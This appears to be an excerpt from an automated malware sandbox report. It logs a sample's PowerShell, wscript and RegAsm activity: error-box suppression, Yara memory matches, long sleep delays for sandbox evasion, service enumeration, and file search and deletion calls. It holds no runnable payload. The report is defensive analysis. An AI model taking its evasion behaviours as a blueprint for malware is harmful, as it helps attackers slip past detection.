                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: Yara match File source: 00000006.00000002.2273102577.000001C100222000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: powershell.exe PID: 3136, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 20_2_0040F7E2 Sleep,ExitProcess, 20_2_0040F7E2
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD345A2AD3 str word ptr [eax] 2_2_00007FFD345A2AD3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 20_2_0041A7D9
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1717
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1472
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3910
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5930
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8061
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1430
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8162
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1389
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3620
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 928
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: threadDelayed 5011
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: threadDelayed 4502
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: foregroundWindowGot 1740
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1203
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1022
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API coverage: 6.1 %
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5356 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2100 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 416 Thread sleep count: 3910 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 416 Thread sleep count: 5930 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2536 Thread sleep time: -13835058055282155s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4828 Thread sleep count: 8061 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1128 Thread sleep count: 1430 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 884 Thread sleep time: -12912720851596678s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7052 Thread sleep count: 8162 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2364 Thread sleep count: 1389 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1584 Thread sleep time: -15679732462653109s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4420 Thread sleep count: 3620 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3660 Thread sleep count: 286 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5492 Thread sleep time: -3689348814741908s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6524 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6724 Thread sleep count: 928 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6724 Thread sleep count: 194 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5388 Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6656 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5192 Thread sleep count: 132 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5192 Thread sleep time: -66000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5112 Thread sleep count: 5011 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5112 Thread sleep time: -15033000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5112 Thread sleep count: 4502 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5112 Thread sleep time: -13506000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5272 Thread sleep count: 1203 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6552 Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5328 Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 876 Thread sleep count: 1022 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5232 Thread sleep count: 102 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2220 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,20_2_0040928E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,20_2_0041C322
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,20_2_0040C388
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,20_2_004096A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,20_2_00408847
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00407877 FindFirstFileW,FindNextFileW,20_2_00407877
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0044E8F9 FindFirstFileExA,20_2_0044E8F9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,20_2_0040BB6B
